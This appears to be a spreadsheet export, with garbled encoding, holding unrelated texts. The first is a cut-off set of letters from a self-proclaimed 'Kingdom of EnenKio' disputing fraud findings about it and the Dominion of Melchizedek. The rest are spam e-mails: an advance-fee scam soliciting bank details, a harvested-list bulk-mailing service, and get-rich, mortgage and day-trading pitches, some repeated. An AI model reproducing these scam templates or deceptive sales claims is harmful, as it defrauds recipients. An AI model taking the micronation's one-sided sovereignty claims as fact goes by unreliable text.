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Communiquï¿½ï¿½,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the following line by line correction. For your convenience, your text will be set off (with "**") in color: **DOM is located on Karitane Island and now includes the Taongi Atoll in the Northern Atolls of the Marshall Islands in the South Pacific 1000 miles south of Tahiti.** (Comment: The construction of this statement implies the Marshall Islands are in the South Pacific Ocean 1000 miles south of Tahiti, in which case a reader may be misled.) 
Correction: DOM is located on Karitane Island in the South Pacific, 1000 
miles south of Tahiti, and now includes Taongi Atoll in the Northern Atolls of the Marshall Islands in the North Pacific. **However, the Marshall Islands government has condemned the "fraudulent assertions" of two organizations, ...** 
(Comment: Just because the RMI government "...has condemned the 'fraudulent assertions' ...of ...EnenKio...", does that make it true? Why would you want to quote anything from a government that has been internationally criticized [and documented] time and again for fraud, abuse of human rights, outright theft and is in default on almost every financial obligation it has ever made? What purpose do you propose to serve by attacking a concerned group of dedicated people fighting for the very lives of Marshallese natives who have been overrun by foreign invaders, bathed in radiation from nuclear fallout and abused by their own corrupt government?) 
**...namely the DOM and sister nation, the Kingdom of EnenKio (the Marshallese name for Wake Island),...** 
(Comment: Nothing could be further from the truth. we cannot speak for DOM, but as for the Kingdom, we don't even know what being a "sister nation" means and for you to make this categorically false statement is not only a blatant sign of ignorance of the state of EnenKio, it is a deceptive intrusion upon the sovereign, His Majesty King Remios, the sovereign of EnenKio and Eneen-Kio Atoll, and an inexplicable and irresponsible abuse of journalism. Doesn't anybody check sources anymore?) 
Correction: The Kingdom of EnenKio is an independent sovereign state and 
the same could be said for DOM. 
**...claiming to represent the mid-Pacific nation amid an alleged investment scam according to an article in Agence France- Presse.** (Comment: The government of the Kingdom of EnenKio represents the people of EnenKio, who are forced to live in exile from Eneen-Kio Atoll, lands and seas that played a significant role in Marshallese culture for perhaps 2000 years. Furthermore, "...an article in Agence France-Presse" has no merit as it was authored by a source in the Marshall Islands government. My preceding comments apply. The Kingdom of EnenKio is not now and never has been engaged in an "...investment scam...". We have tried for many years to attract qualified investors and funding sources for programs that will not only benefit the people of EnenKio, but also will positively impact people around the globe. In fact, we are currently working with a former NASA Astronaut. One tool scammers have in their arsenal is to discredit visionary programs of legitimate entities so they can feed on carcasses of the ignorant. Many journalists use the same technique to sell their stories on sensationalism. Doesn't anybody check sources anymore?) 
**The Marshall Islands foreign ministry has issued warnings to countries against acknowledging any fraudulent claims made by representatives of either nation.** 
(Comment: The Kingdom of EnenKio has made no "fraudulent claims" of which I am aware, and in my post, I am responsible for all published information. I would personally caution any "..countries against acknowledging any fraudulent claims made by representatives of..." nations, companies or publications if I had credible proof to that effect. However, my preceding comments apply as to credibility of any RMI ministry source. Furthermore, the RMI has repeatedly attacked the credibility of His Majesty King Hermios, who happens to be the ancestral sovereign owner under Marshallese custom of over 1/3 of the land in the Marshall Islands, including recent attempts to sequester him against his will. We believe some officials in the RMI are afraid of what will happen to them if honesty and integrity returns to the administration of lands and programs to assist the people with their pressing needs and they no longer have their hands on the till. To perpetrate their jaundiced agenda is an irresponsible abuse of journalism.) **A Honolulu-based attorney created the "Kingdom of EnenKio" in the early 1990s.** 
(Comment: Mr. Moore is not an Attorney, though he was living in Honolulu in the early 1990s.) 
Correction: The Kingdom of EnenKio was established by decree of the 
owner of Eneen-Kio Atoll [a.k.a. Enen-kio, Halcyon, Disclerta, Wake and 6-8 other names], Iroijlaplap Murjel Hermios, who then was Paramount Chief of the Northern Ratak atolls [he passed away in December 1998] and was fully recognized by the RMI government. He declared the sovereign state of EnenKio in 1994, whereupon the people chose him as their King over Eneen-Kio Atoll, ratified the Constitution and established government as a limited constitutional monarchy. **It was based on a power of attorney agreement with Marshall Islands paramount chief Mursel (sic) Hermios, which granted the attorney broad powers to act on his behalf.** 
Correction: The establishment of the Kingdom of EnenKio was made 
possible by Murjel's appointment of Mr. Robert Moore, the adopted brother of Hermios, Alab of Taongi Atoll and a private citizen, to the post of Minister Plenipotentiary. The document of appointment was also a Special Power of Attorney which granted Mr. Moore very specific instructions to do whatever was possible to expel the United States from Eneen-Kio Atoll and establish an independent state on Hermios' and the people's behalf. 
**The Marshall Islands High Court has ruled the agreement invalid and ordered it nullified, which the "kingdom" has disputed.** (Comment: Since when is a Special Power of Attorney an "agreement"? The Marshall Islands High Court has no record or knowledge of the Special Power of Attorney, except as has been publicized by the Kingdom of EnenKio, and certainly exercises no jurisdiction over Eneen-Kio Atoll, which lies over 100 miles north of lawful RMI boundaries. The RMI has no political or territorial jurisdiction over the islands and seas of Eneen-Kio Atoll because the atoll, by any name you choose, was not incorporated into the RMI when it formed its government in 1979, nor was it subsequently incorporated by any act, law, mandate or otherwise of any present or former Iroijlaplap or Monarch of Eneen-Kio and any statement to the contrary is false, fraudulent and irresponsible.) Finally, I suggest you, as a journalist or publisher, do a little more research, not only into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and documents mentioned above, all of which exist in hard copy (not in 'cyberspace') and most of which are referenced or published at our official web site.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 if corrected elsewhere, that a link be provided to the relevant paragraph cited above in the article. 
SKIP TO NEXT FILE ï¿½TOP OF PAGE 
June 3, 1999- Sir: The following report was sent to me in which the author mentions the Kingdom of EnenKio (thank you for spelling 'EnenKio' correctly. The purpose of this letter below is to lodge a formal request for correction of false and misleading statements made by the author regarding the Kingdom of EnenKio. 
"Fantasy Island" -- "Melchizedek passport scam reveals how the Internet can take fraud to new frontiers" By Bertil Lintner in Bangkok, December 10, 1998: "Determined not to give up, Pedley moved his fictional nation once again, this time to Taongi atoll in the Western Pacific. According to a Melchizedek press release, posted on its home page, Taongi was leased in 1997 under a treaty with representatives of "the kingdom of EnenKio," another only-in- cyberspace country, which in this case claims the U.S.-held Wake Island. In real life, Taongi is an uninhabited atoll in the Marshall Islands." 
http://www.feer.com/Restricted/index_corrections.html (link to article of December 24, 1998: "Fantasy Island", disconnected as of 2/1/00) Response to the author: I am unable to locate the "Melchizedek press release" you cited, indicating that "...Taongi was leased in 1997 under a treaty with representatives of "the kingdom of EnenKio,...". Such an act would be impossible and implausible as EnenKio has no legal authority or political jurisdiction over Taongi Atoll in the Marshall Islands. Further more, Melchizedek (DOM) is not so uninformed as to publicly advertise an illegal act in the midst of attempting to find a suitable land base for its people to administer their form of government. 
The Kingdom of EnenKio did enter into a treaty with DOM on the 19th day of September, 1997, but it did not convey a lease of land. It declared a state of peace and established diplomatic recognition between our governments. However, a prior agreement, signed in May 1997, which had nothing to do with the Kingdom of EnenKio, transferred Mr. Robert Moore's rights to develop Taongi from Mr. Moore to DOM. It did not convey a lease at that time and no such document is in existence. This was made possible because Mr. Moore is the Alab (one class of landowner) of Taongi and had a legal power of attorney pertaining to Taongi Atoll, from the principal landowner, Iroijlaplap (Paramount Chief) Murjel Hermios, who was aware of and supported the transaction. Consideration, if any, under the agreement was personally retained by Mr. Moore, who is also the adopted brother of Hermios. Now, please understand, that while Mr. Moore was acting in the latter case on his own behalf, and that of the future use and development of Taongi, which would have generated an income to Iroijlaplap Hermios, Mr. Moore wears another hat as Minister Plenipotentiary of the Kingdom of EnenKio. Iroijlaplap Hermios, also wore (he died in December 10, 1998, the same date of your article) other hats: one as First Monarch, King of the Kingdom of EnenKio and one as owner in allodium of Eneen-Kio Atoll (a.k.a. Enen-kio, Halcyon, Disclerta, Wake and several other names). For you to state the Kingdom of EnenKio is "...another only-in- cyberspace country...", as you did in the above article, is not only a completely and categorically false statement, but it is a blatant sign of ignorance of the state of EnenKio. And, it is a blatant deceptive intrusion upon His Majesty King Hermios, the sovereign of EnenKio and Eneen-Kio Atoll, and an inexplicable and irresponsible abuse of your journalistic license -- unless, of course, your statement could be proved accurate. I suggest you do a little more research, not only into the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all of which exist in hard copy (not 'cyberspace') and most of which are referenced or published at our official web address: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that the link be added to the relevant paragraph cited above in the article. SKIP TO NEXT FILE ï¿½TOP OF PAGE 
June 2, 1999- Sir: The following statement (in quotes) was copied from one of your Footnotes to History -D and E (disconnected as of 12/1/00). "Enenkio Atoll- In 1898, the United States annexed Wake Island, in the Marshall Islands of the western Pacific. After the Marshalls became a U.S. Trust Territory, the traditional chiefs of the area agitated for recognition that Wake Island was a part of the Marianas chain, and pressed their historical claims to the atoll, called Enenkio locally. The U.S. government has consistently ignored these claims. The protests took a sharper turn after the U.S. Congress in 1993 acknowledged the illegality a hundred years earlier of the establishment by Americans of the Republic of Hawai'i. King Murjel Hermios, who is paramount chief of an archipelago in the northern Marshalls, declared Wake Island's independence in 1987.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Comment: With all candor, I cannot figure how such straight forward facts such as we have presented to the public and over the Internet since 1994 could have possibly been construed into the above referenced text. While I am pleased to find you have apparently taken a very serious interest (unless your site is intended as some twisted joke, which I am assuming is not the case) in the history of the Kingdom of EnenKio, I am aghast at how distorted, erroneous and misleading your summary is. As a consequence of my service to His Majesty King Remios and the people of EnenKio, I will respectfully offer the following line by line correction. For your convenience, your text will be set off (with "**") in color: 
**In 1898, the United States annexed Wake Island, in the Marshall Islands of the western Pacific.** 
Correction: In 1898, the United States invaded Wake Island, the 
northernmost atoll -- actually named Eneen-Kio centuries before western explorers arrived -- of the Ratak chain of Marshall Islands in Micronesia and the Central North Pacific Ocean. The Author responds: "Rest assured that I did not mean to downplay the role of violence in the American acquisition of the territory." **After the Marshalls became a U.S. Trust Territory, the traditional chiefs of the area agitated for recognition that Wake Island was a part of the Marianas chain, and pressed their historical claims to the atoll, called Enenkio locally.** Correction: Following W.W.II, the Trust Territories of the Pacific, which included the Marshall Islands, was placed under administration of the United States by the United Nations. While Eneen-Kio was well established as one of the Marshalls, the U.S. only knew it as Wake and, having lost many U.S. lives there in 1941 at the hands of Japanese invaders, kept control of it. In 1993, the Paramount Chief of the Ratak atolls pressed his clan's historical and lawful claim to the 3 islands of Eneen-Kio Atoll. 
The Author responds: "I don't see much conflict between the two versions here." 
**The U.S. government has consistently ignored these claims.** Correction: The U.S. government has consistently ignored claims from the Marshall Islands government, which failed to exert a claim during its move to independence in 1979, and from the former traditional landowners, including Iroijlaplap Murjel Hermios. The Author responds: "I will note this." **The protests took a sharper turn after the U.S. Congress in 1993 acknowledged the illegality a hundred years earlier of the establishment by Americans of the Republic of Hawai'i.** Correction: The Eneen-Kio claims gained some new momentum after precedents were set by the U.S. Congress, when in 1993 they acknowledged the illegality of the 1893 overthrow of the Monarch of the Kingdom of Hawai'i by a group of American businessmen and U.S. Marines, and in the following year returned the island of Kaho'olawe to the Hawaiian People. **King Murjel Hermios, who is paramount chief of an archipelago in the northern Marshalls, declared Wake Island's independence in 1987.** Correction: King Murjel Hermios, who was Paramount Chief until his death in December 1998, declared the sovereign state of EnenKio in 1994, whereupon the people chose him as their King over Eneen-Kio Atoll, ratified the Constitution and established government as a limited constitutional monarchy. 
The Author responds: "I will make the necessary corrections here."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Correction: After the death of the First Monarch, his brother Remios 
succeeded to the throne as Second Monarch and rules along with his brother, Crown Prince Lobadreo, over the Kingdom of EnenKio today. To continue the commentary: The parts left out were either wrong or have nothing to do with the history of the Kingdom of EnenKio itself. Since HM King Remios also succeeded to Iroijlaplap of the northern Ratak atolls of the Marshall Islands, he also has responsibilities over 10 atolls, 2 islands and over 300 atoll islets. But that is another story, which has nothing directly to do with the Kingdom of EnenKio. I have offered this treatise in hopes that you will find the time to correct your site per my suggestions. Please feel free to contact me or view our pages at the address above. Thank you in advance for your attention and interest in this matter. 
The Author responds: "I imagine that you are asserting here that Moore's Melchizedek project (which can be located on the web through the Sources &amp; Bibliography section of my web page) is non-existent. Be assured I will look further into\par this. Thank you again for your response, Captain Rydell. I should be posting a revised version of the page in the next week or so." (June 7, 1999) 
SKIP TO NEXT FILE ï¿½TOP OF PAGE
June 1, 1999: News Release
Part One Background: 
On May 21, 1999, the Ministry of Foreign Affairs and Trade of the Republic of the Marshall Islands posted a "press release" on the Internet at: http://www.yokwe.net/mboard/newsinfo/thread.cgi?67,0\cf0 (discontinued as of 12/1/00). The author, "Mr. Joseph Biglar, Undersecretary", is not known to us, has not heretofore communicated with the government of the Kingdom of EnenKio, nor with its Monarch, His Majesty King Remios, at any time and has no knowledge of any policies or state activities of EnenKio. There is no valid reason to assume that the said "press release" is indeed an official document. The Republic of the Marshall Islands has perfect knowledge that representatives of the Kingdom of EnenKio, headed by His Majesty King Remios, on the basis of his proper and lawful authority, have the right and obligation to speak in support of the interests of certain persons, many of whom happen to be Marshallese nationals residing in the Marshall Islands. Response to so-called "Press Release": 
This unprovoked attack upon His Majesty King Remios, Monarch of the Kingdom of EnenKio, by the Ministry of Foreign Affairs and Trade of the Republic of the Marshall Islands is wholly false. It is also unjustifiably inflammatory and amounts to little more than an unquestionable confirmation of the predilection for infringement upon Marshallese sovereign rights exercised by the current administration of the Republic of the Marshall Islands, which has been confirmed by the U.S. State Department. (See: Human Rights Report) This public posting shall serve as constructive notice to the Marshall Islands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The RMI is unequivocally cognizant that the Kingdom of EnenKio: ï¿½ï¿½ ï¿½ï¿½ exists as a sovereign state as defined by the Montevideo Convention (1933). 
ï¿½ï¿½ ï¿½ï¿½ was conceived as a separate independent state by its sovereign, 
Iroijlaplap Murjel Hermios, in 1987. 
ï¿½ï¿½ ï¿½ï¿½ was established by way of a public authority, the Constitution 
of the Kingdom of EnenKio Atoll, ratified in 1994 by its people. ï¿½ï¿½ ï¿½ï¿½ has negotiated diplomatic and trade treaties with many other states, including the Dominion of Melchizedek ï¿½ï¿½ ï¿½ï¿½ has asserted political and territorial jurisdiction over islands and seas which lie entirely outside and well beyond the area defined as 
- now quoting Mr. Biglar's statement - "RMI geographical and political
boundaries." 
ï¿½ï¿½ ï¿½ï¿½ exercises authorities founded upon prehistoric traditional and 
matriarchal ancestral rights and titles bestowed, under the sacred heritage of Marshallese customary law (reinforced by the RMI Constitution), upon the acknowledged Iroijlaplaps of the Northern Ratak atolls, whose authority is certainly not subject to scrutiny by Ministry of Foreign Affairs and Trade of the Republic of the Marshall Islands. ï¿½ï¿½ ï¿½ï¿½ has not subjugated, assigned or encumbered any of its political 
jurisdiction within its defined territorial boundaries of islands and seas of Eneen-Kio Atoll to the government or people of the Dominion of Melchizedek or to any other entity, including the Republic of the Marshall Islands. 
Mr. Biglar is unequivocally cognizant that the Republic of the Marshall Islands: 
ï¿½ï¿½ ï¿½ï¿½ also exists as a sovereign state, defined by the Montevideo 
Convention (1933). 
ï¿½ï¿½ ï¿½ï¿½ was conceived as a separate state by (UN) foreign governments, 
which included the United States, China and the USSR. ï¿½ï¿½ ï¿½ï¿½ was also established under a public authority, the Constitution of the Marshall Islands, ratified in 1979 by its people. ï¿½ï¿½ ï¿½ï¿½ has no relations with EnenKio that allows RMI knowledge of anything that is not also public information and no such public information respecting relations with the Dominion of Melchizedek has ever been disseminated to harm the RMI to be condemned by Mr. Biglar. ï¿½ï¿½ ï¿½ï¿½ has no political or territorial jurisdiction over the islands and seas of Eneen-Kio Atoll, which was not incorporated into the RMI in 1979, nor subsequently incorporated by any act, law or mandate of any present or former Iroijlaplap or Monarch thereof and any statement to the contrary is fraudulent, as in the instant matter. ï¿½ï¿½ ï¿½ï¿½ exercises authorities founded upon the RMI Constitution, which does not incorporate nor authorize political jurisdiction over territorial boundaries that include the islands or seas of Eneen-Kio Atoll and any statement to the contrary is fraudulent, as in the instant matter. ï¿½ï¿½ ï¿½ï¿½ has refused to acknowledge the leadership of the Kingdom of 
EnenKio in their every attempt to get the RMI government to mitigate the suffering of people residing in the Ratak atolls, under jurisdiction of Iroijlaplap Hermios, and the RMI has rejected every suggestion to coordinate prospective relief efforts through the said Iroijlaplap Hermios. 
The Ministry of Foreign Affairs and Trade of the Republic of the Marshall Islands is steadfastly advised that any unilateral statements or actions by the administration of the Republic of the Marshall Islands which purport, seek or serve to diminish or question the credibility, existence or authority of the government of the Kingdom of EnenKio in the conduct of its affairs of state, without legitimate authentication by a court of competent jurisdiction, are hereafter to be taken as deliberate acts of aggression upon the Monarch of the Kingdom, His Majesty King Remios, as Head of State, the government of the Kingdom of EnenKio and its people, and will be countered with appropriate responsive measures. 
Furthermore, in light of the Ministry of Foreign Affairs and Trade of the Republic of the Marshall Islands announcement concerning the Kingdom of EnenKio, your attention is respectfully directed to the following statement in the Preamble of the Constitution of the Marshall Islands, then you decide for yourself: 
"With this Constitution, we affirm our desire and right to live in peace and harmony, subscribing to the principles of democracy, sharing the aspirations of all other peoples for a free and peaceful world, and striving to do all we can to assist in achieving this goal." On behalf of His Majesty King Remios, we, administrators of the Kingdom of EnenKio, have wholeheartedly agreed to pursue the same goal for a free and peaceful world and have made no effort to the contrary. (See also: Report on RMI Mismanagement) 
SKIP TO NEXT FILE ï¿½TOP OF PAGE
News Release, Part Two, June 1, 1999
Part Two Background: 
The International Narcotics Control Strategy Report, 1998 (click on reference # 2 below) released by the Bureau for International Narcotics and Law Enforcement Affairs, U.S. Department of State, Washington DC, February 1999, states as follows: 
"Where Are OFCs Located? 
[Paragraph 4] Thus, it is now possible for an enterprising jurisdiction anywhere in the world to establish itself as an emerging OFC. The newest OFCs, e.g., Niue and the Marshall Islands, are now sprouting in remote areas of the world, such as the Pacific. Even more "remote" are mere figments of fertile imaginations such as the Dominion of Malchizedek (sic) or The Kingdom of Enenkio Atol (sic), both entirely fraudulent in intent and practice." [note: OFC = Offshore Financial Center] Response: This unprovoked attack upon His Majesty King Remios, Monarch of the Kingdom of EnenKio, the sovereign state of EnenKio and its noble citizenry by the U.S. Department of State is a reprehensible categorically false challenge of the sovereignty of the Kingdom of EnenKio. It is also unjustifiably inflammatory and amounts to an unqualified felonious defamation of the international reputation of His Majesty King Remios, the government of the Kingdom of EnenKio and organs thereof. 
The unmitigated audacity and arrogance of the United States to attempt to link the Kingdom of EnenKio with International Crime, narcotics trafficking, money laundering, tax evasion, international drug cartels, terrorists, bank fraud or any other sort of criminal activity, without even one microscopic fragment of substantive evidence to corroborate such deliberately nefarious statements is reprehensible in the least. This public posting shall serve as constructive notice to the United States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Furthermore, this matter will not be resolved until the President of the United States issues a formal apology to His Majesty King Remios, along with the government of the Kingdom of EnenKio, and the Congress of the United States initiates a thorough investigation into the abuses of power, subversion of natural rights and illegal occupation by the United States of the islands and seas of Eneen-Kio Atoll. Congressional representatives to Hawaii, the nearest State of the United States to Eneen-Kio Atoll, and those of other states, have repeatedly been advised of the foregoing atrocities and conditions and have failed to respond in kind. The United States is obligated as the self-assured trustee of Pacific Island States in Micronesia to respond to the charges of "ethnic cleansing" and her responsibility to EnenKio is no less. For further information and links to documents, see: EnenKio Documents http://www.state.gov/www/global/narcotics_law/1998_narc_report/ml_intro.html http://www.state.gov/www/global/narcotics_law/1998_narc_report/index.html March 16, 1999: News Release 
The impact of the passing on December 10 of His Majesty Murjel Hermios, First Monarch of the Kingdom of EnenKio, Iroijlaplap of the Northern Ratak Atolls of the Marshall Islands, beloved husband and father, was felt throughout the society.ï¿½ï¿½ Flags were flown at half mast for a week 
in the Marshalls and for a a month at EnenKio Consulates around the world.ï¿½ï¿½ His remains were interred in a remote site reserved f</t>
  </si>
  <si>
    <t xml:space="preserve">Fortunes are literally being made in this new marketplace.Over $9 Billion in merchandise 
        was sold on eBay in 2001 by people just like you - right from 
        their homes! 
Now you too can learn the secrets of successful selling 
        on eBay and make a staggering income from the comfort 
        of your own home. If you are motivated, capable of having 
        an open mind, and can follow simple directions, then visit 
        us here. If server busy - alternate.
You received this offer as a result of an affiliate relationship 
        with one of our marketing partners. If you are not interested in future 
        offers go here.Â 
Â  
Â 
Â  
</t>
  </si>
  <si>
    <t xml:space="preserve">MR MARTIN FRANCIS
ABIDJAN COTE DÂ’IVOIRE
WEST AFRICA
TEL:+225 05775748.
                  URGENT AND NOBLE PROPOSALATTN: DIRECTOR.
DEAR ,I wish to extend my greeting to you and your entire
family. I got your contact from the ivoirian chamber
of commerce, I prayed over it and selected your name
among other names because of its esteeming
nature.Morever,after my strong prayers and fasting,
God reveals to me that you are straight forward,
Honest and GodÂ’s person.
This is the reason I never waste time to propose you
this business for our mutual benefits. Infact, You
will never regret it provided you give me your
possible best cooperate hand, Believe me.I am MARTIN FRANCIS, A cote dÂ’ivoire national and the
only child of late Mr and Mrs FRANCIS. My late father
was the former financial controller of CÃ´te dÂ’Ivoire
telecommunication (CITELCOM). My father died due to
the heat of political crisis in my country recently
last years.But,I am motherless since,before my fathers
late and the death of my mother on 26 SEPTEMBER 1993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us$16,500,000.00 (sixteen million,five 
hundred thousand united states dollars) which he
deposited in a bank here in my county Abidjan, 
CÃ´te dÂ’Ivoire and used my name,MARTIN FRANCIS as the
next of kin for the deposits. This amount was accrued
from an over-invoiced contract award for the
construction of an underground telephone network to
replace the former in the new city (Yamoussoukro) and
other major cities also for installation of the
microwave station awarded to my late father,Mr JOSEPH
FRANCIS in 1999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payment,providedyou cooperate.Therefore I am seeking your full and
urgent  assistance for the telegraphic transfer of
this sixteen million and five hundred thousand united
states dollars, us$16,500.000 US dollars to your
designated account for a very good business investment
in your country as due to the instruction my father
gave to me before he late. What I require from you are
as follows.1.Your private telephone and fax number for easy and
strict communication
2.Your bank particular for smooth and successful
remittance of this monies to your nominated account
3.You have to make necessary arrangement for me to
meet with you immediately the monies is been
transferred in your account and confirmed by you.
4.You have to secure a college for me in your country
to further my education. 
5.You will have to be my guardian and part of the
joint venture investment when I get to your country.Furthermore, my late father had instructed me to offer
20 % of the total sum to the person who is to assist
me out for the transferring of this fund.Moreover, I wish to assure you that this transaction
would be concluded within the next(3)days you signify
interest to assist me out.I suggest that this
transaction should be handled in strict confidence
because I have work out fine every modalities
concerning the transfer of this fund. 
Please and please, kindly hasten up the arrangement as
quickly as possible because my late father instructed
me not to invest this monies in this country CÃ´te-
dÂ’Ivoire. That I should invest abroad of my choice for
the benefit of myself and for security reasons.Thank very much in anticipation of your
acknowledgement of this business proposal and do not
hesitate to contact me immediately you receive this
message with this my direct telephone number mentioned
above, tel : + 225 05775748 for us to proceed
immediately. Please and please, donÂ’t fail.waiting for your urgent response nowthanks very much again and God bless.best regardsMARTIN FRANCIS.
___________________________________________________________
Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en franÃ§ais !
Yahoo! Mail : http://fr.mail.yahoo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Homeowner,
Interest Rates are at their lowest point in 40 years!We help you find the best rate for your situation by
matching your needs with hundreds of lenders!Home Improvement, Refinance, Second Mortgage,
Home Equity Loans, and More! Even with less than
perfect credit!This service is 100% FREE to home owners and new
home buyers without any obligation. Just fill out a quick, simple form and jump-start
your future plans today!
Visit http://61.145.116.186/user0201/index.asp?Afft=QM10
To unsubscribe, please visit:http://61.145.116.186/light/watch.asp
</t>
  </si>
  <si>
    <t xml:space="preserve">It was the Spring of 1979.  I was just a tall, goofy looking kid in middle school
with buck-teeth and freckles.  Each day in the
cafeteria, I walked from table to table ...Stealing other kids' lunch money.No,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longer.Eventually the end of the year came and went, high school
started and with it came girls, and homework, and parties,
and sports, and those poor kids from eighth grade had more 
things on their mind than last year's lunch money.I made off with a tidy sum for a middle school kid,
and I didn't even get beat up.Hidden inside this story are the two greatest stock market 
secrets you will ever learn.First of all, greed is your number one enemy. You're not
going to turn $2 into $5 in a week, so cash out when
you're ahead.  Don't wait for the boat to sink before 
grabbing the lifejacket.Second, never trust an investment adviser of any kind.
They are looking out for their own money, not yours.The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problem:Do you want to WAIT thirty or forty years to be rich?Hell no!You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dollars.They make their money only if you believe two lies:1) That investing is too difficult and risky for the average 
person.2) That using an investment adviser who charges a high 
commission is safer than trading online for a few bucks 
per trade.Here is what the financial gurus in today's society absolutely,
positively DO NOT WANT YOU TO KNOW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Achieving financial success is incredibly simple.** Anyone can do it.** It only takes a few hours to learn.When I discovered the secret to day trading, I didn't become
wealthy overnight.  If you want instant cash, drive to Wal-mart. 
Buy a ski mask and a shotgun, and rob your local bank. The 
only way to get rich, quick or otherwise, is through
hard work, knowledge, and determination.After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market?"Who is looking out for your best economic interests - some
wealthy Wall Street stockbroker, or yourself?With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dollars.The Master Trader e-book is the most comprehensive yet easy to 
understand and straight-forward book ever written about active 
trading. If you are serious about success in short term stock 
trading - ORDER TODAY and start paving the road to your
own financial future.Oh, and remember that scraggly kid in the eighth grade?
His high school friends laughed when he said he was going to 
make money in the stock market.  Six years later, he bought a beach-front home on the California
coast - WITH CASH.  Oops, they weren't laughing anymore.In a rollercoaster market like we have today, day trading
is the fastest track to wealth.  If you're looking
for a long-term retirement investment with no risk 
that goes up 5% a year, then by all means, this ain't
your kind of game.But if you want the QUICKEST possible way to make a FORTUNE
in the market, with the lowest element of risk, then
order the MASTER TRADER e-book right now.  I promise
to teach you ALL of the secrets that helped me become a
millionaire through successful day trading.You don't need to know anything about the market, and
anyone can do it, with minimum effort.  It's an easy
game to win if you know how the pieces move.Order the MASTER TRADER e-book right now for only $49.97
by clicking on the link below:http://4tools4life.com/qs******************************************************
Our company is strictly opposed to unsolicited emails.
To be removed from this list, please send an email
to "bulkexpert@yahoo.com"
******************************************************
8149uUYq4-233hRIC7588TJuY9-579ZiuA2166lzLR3-402TYER3917ynRP5-992Zkl62
</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</si>
  <si>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promotion to a list of our
general/business addresses.
The greatest part is, it's completely affordable.E-MAIL MARKETING IS THE ANSWER! How do we know? We know because that's exactly what we do.It's a proven fact that you can attract 
new business through our Direct E-mail Marketing. The profits that E-mail advertising generate are amazing!We are living proof. We are a direct E-mail internet advertising company and 
our clients pay us thousands of dollars a week to E-mail 
their products and services.  STANDARD PRICING AND PROCEDURES----------------------------------------------------------EXTRACTING:Our list of general Internet addresses are actually extracted 
from the most popular web sites on the Internet. The addresses 
are verified and run through our purification process. 
The process includes addresses run against our custom remove 
filter of 2,492 keywords, as well as through our 192MB remove /
flamer list. The EDU, ORG, GOV, MIL, and US domains are removed, 
as well as other domains that asked not to receive e-mail.------------------------------------------------------------EVALUATION:  $350.00 (optional)
One of our marketing specialists will evaluate your sales 
letter, and offer his/her expertise on how to make it the 
most successful.-------------------------------------------------------------STANDARD PRICING: (Emails Delivered)
1 Million- $700.00 per
2-3 Million- $600.00 per
4 Million- $500.00 per
5 Million &amp; up - $400.00 per--------------------------------------------------------------SPECIAL LIMITED TIME OFFER!This introductory offer of $300.00 includes:1. Set-Up Fee
2. Evaluation of Sales Letter 
3. 500,000 e-mails delivered--------------------------------------------------------------PAYMENT POLICY:
All services must be paid in full prior to delivery of 
advertisement.---------------------------------------------------------------
NOTICE: 
Absolutely no threatening or questionable materials. If you are serious about Direct&gt;&gt;Email&gt;&gt;Marketing&gt;&gt;--Send 
the following to {fax} 1(602) 392-8288
---------------------------------------------------------------PLEASE FILL THIS FORM OUT COMPLETELY!Contact Name: _____________________________________________Business Name:  ______________________________________# Years in Business:  _________________________Business Type:  ______________________________________Address: _________________________________________________City: ____________________  State: ______  Zip: ______________  Country: _______________Email Address: _______________________________________________Phone:  __________________________ Fax:  _______________________
&gt;&gt;&gt;&gt;&gt;-&gt;
To get out of our email database send an email to publicservice1@btamail.net.cn
</t>
  </si>
  <si>
    <t xml:space="preserve">It was the Spring of 1979.  I was just a tall, goofy looking kid in middle school
with buck-teeth and freckles.  Each day in the
cafeteria, I walked from table to table ...Stealing other kids' lunch money.No,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longer.Eventually the end of the year came and went, high school
started and with it came girls, and homework, and parties,
and sports, and those poor kids from eighth grade had more 
things on their mind than last year's lunch money.I made off with a tidy sum for a middle school kid,
and I didn't even get beat up.Hidden inside this story are the two greatest stock market 
secrets you will ever learn.First of all, greed is your number one enemy. You're not
going to turn $2 into $5 in a week, so cash out when
you're ahead.  Don't wait for the boat to sink before 
grabbing the lifejacket.Second, never trust an investment adviser of any kind.
They are looking out for their own money, not yours.The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problem:Do you want to WAIT thirty or forty years to be rich?Hell no!You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dollars.They make their money only if you believe two lies:1) That investing is too difficult and risky for the average 
person.2) That using an investment adviser who charges a high 
commission is safer than trading online for a few bucks 
per trade.Here is what the financial gurus in today's society absolutely,
positively DO NOT WANT YOU TO KNOW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Achieving financial success is incredibly simple.** Anyone can do it.** It only takes a few hours to learn.When I discovered the secret to day trading, I didn't become
wealthy overnight.  If you want instant cash, drive to Wal-mart. 
Buy a ski mask and a shotgun, and rob your local bank. The 
only way to get rich, quick or otherwise, is through
hard work, knowledge, and determination.After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market?"Who is looking out for your best economic interests - some
wealthy Wall Street stockbroker, or yourself?With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dollars.The Master Trader e-book is the most comprehensive yet easy to 
understand and straight-forward book ever written about active 
trading. If you are serious about success in short term stock 
trading - ORDER TODAY and start paving the road to your
own financial future.Oh, and remember that scraggly kid in the eighth grade?
His high school friends laughed when he said he was going to 
make money in the stock market.  Six years later, he bought a beach-front home on the California
coast - WITH CASH.  Oops, they weren't laughing anymore.In a rollercoaster market like we have today, day trading
is the fastest track to wealth.  If you're looking
for a long-term retirement investment with no risk 
that goes up 5% a year, then by all means, this ain't
your kind of game.But if you want the QUICKEST possible way to make a FORTUNE
in the market, with the lowest element of risk, then
order the MASTER TRADER e-book right now.  I promise
to teach you ALL of the secrets that helped me become a
millionaire through successful day trading.You don't need to know anything about the market, and
anyone can do it, with minimum effort.  It's an easy
game to win if you know how the pieces move.Order the MASTER TRADER e-book right now for only $49.97
by clicking on the link below:http://4tools4life.com/qs******************************************************
Our company is strictly opposed to unsolicited emails.
To be removed from this list, please send an email
to "bulkexpert@yahoo.com"
******************************************************0283PTfl6-774Bfbm7392dPuV0-307VjSM4803zjlu1-614iiKT2570JdKt6-854fhdA5838oELl71
</t>
  </si>
  <si>
    <t xml:space="preserve">It was the Spring of 1979.  I was just a tall, goofy looking kid in middle school
with buck-teeth and freckles.  Each day in the
cafeteria, I walked from table to table ...Stealing other kids' lunch money.No,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longer.Eventually the end of the year came and went, high school
started and with it came girls, and homework, and parties,
and sports, and those poor kids from eighth grade had more 
things on their mind than last year's lunch money.I made off with a tidy sum for a middle school kid,
and I didn't even get beat up.Hidden inside this story are the two greatest stock market 
secrets you will ever learn.First of all, greed is your number one enemy. You're not
going to turn $2 into $5 in a week, so cash out when
